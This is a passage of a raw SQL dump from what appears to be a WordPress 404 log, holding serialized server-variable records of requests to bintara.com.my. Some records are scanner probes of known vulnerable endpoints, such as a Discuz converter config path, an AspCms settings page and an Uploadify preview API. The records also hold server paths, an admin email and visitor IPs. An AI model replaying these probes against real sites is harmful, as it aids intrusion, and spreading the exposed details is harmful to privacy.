l\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/AutoDiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZcQr2pMrYdOxlcM86ADqAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570181295.8626\";s:12:\"REQUEST_TIME\";s:10:\"1570181295\";}}','notice','2019-10-04 09:28:21','2019-10-04 09:28:16',35783264,37565504,'https://bintara.com.my/AutoDiscover/AutoDiscover.xml',1,0,'1.32.27.67'),(27502,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:33:\"/website/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/website/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/website/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZewpjrYaHfWbFmyiE1zAwAAAYQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/website/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/website/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZewpjrYaHfWbFmyiE1zAwAAAYQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.198.246\";s:11:\"REMOTE_PORT\";s:5:\"59278\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/website/\";s:10:\"SCRIPT_URL\";s:9:\"/website/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZewpjrYaHfWbFmyiE1zAwAAAYQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570222246.9533\";s:12:\"REQUEST_TIME\";s:10:\"1570222246\";}}','notice','2019-10-04 20:50:49','2019-10-04 20:50:47',35032456,36836032,'https://bintara.com.my/website/?xxxxxxxxxxxx_loads=true',1,0,'37.187.198.246'),(27501,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"54179\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZerrDrYaHfWbFmyiE1w-gAAAYw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570220973.0069\";s:12:\"REQUEST_TIME\";s:10:\"1570220973\";}}','notice','2019-10-04 20:29:36','2019-10-04 20:29:33',35414880,37219392,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(27500,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZeJnzASB1ea8fP7LD@xpwAAAQk\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.142.11\";s:11:\"REMOTE_PORT\";s:5:\"58827\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZeJnzASB1ea8fP7LD@xpwAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570212255.952\";s:12:\"REQUEST_TIME\";s:10:\"1570212255\";}}','notice','2019-10-04 18:04:18','2019-10-04 18:04:16',33972360,35785512,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'141.8.142.11'),(27499,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.11.68 (KHTML, like Gecko) Chrome/53.6.0969.5697 Safari/534.50\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.188.84.138\";s:11:\"REMOTE_PORT\";s:5:\"51830\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZeJCDASB1ea8fP7LD@xlgAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570212104.6979\";s:12:\"REQUEST_TIME\";s:10:\"1570212104\";}}','notice','2019-10-04 18:01:47','2019-10-04 18:01:45',35027616,36834760,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'5.188.84.138'),(27498,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZeIVDrYaHfWbFmyiE1iEQAAAYw\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZeIVDrYaHfWbFmyiE1iEQAAAYw\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:14:\"104.148.87.124\";s:11:\"REMOTE_PORT\";s:5:\"50952\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZeIVDrYaHfWbFmyiE1iEQAAAYw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570211924.1384\";s:12:\"REQUEST_TIME\";s:10:\"1570211924\";}}','notice','2019-10-04 17:58:47','2019-10-04 17:58:44',35363240,37173720,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'104.148.87.124'),(27497,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZeISDrYaHfWbFmyiE1iCQAAAZc\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"104.148.87.124\";s:11:\"REMOTE_PORT\";s:5:\"55647\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZeISDrYaHfWbFmyiE1iCQAAAZc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570211912.4664\";s:12:\"REQUEST_TIME\";s:10:\"1570211912\";}}','notice','2019-10-04 17:58:37','2019-10-04 17:58:32',35875104,37673880,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'104.148.87.124'),(27496,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Wayland; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"1.4.142.163\";s:11:\"REMOTE_PORT\";s:5:\"47216\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZeB6hUa2vfvAyNPr0iMiQAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570210282.3435\";s:12:\"REQUEST_TIME\";s:10:\"1570210282\";}}','notice','2019-10-04 17:31:25','2019-10-04 17:31:22',35410136,37209040,'https://bintara.com.my/?page_id=18',1,0,'1.4.142.163'),(27495,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:35:\"/wordpress/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/wordpress/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZd@8ewhi3OTWv4PG6htEwAAAAg\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/wordpress/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZd@8ewhi3OTWv4PG6htEwAAAAg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"40446\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:10:\"SCRIPT_URL\";s:11:\"/wordpress/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZd@8ewhi3OTWv4PG6htEwAAAAg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570209521.8345\";s:12:\"REQUEST_TIME\";s:10:\"1570209521\";}}','notice','2019-10-04 17:18:44','2019-10-04 17:18:42',35033440,36832832,'https://bintara.com.my/wordpress/?xxxxxxxxxxxx_loads=true',1,0,'151.80.54.15'),(27494,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 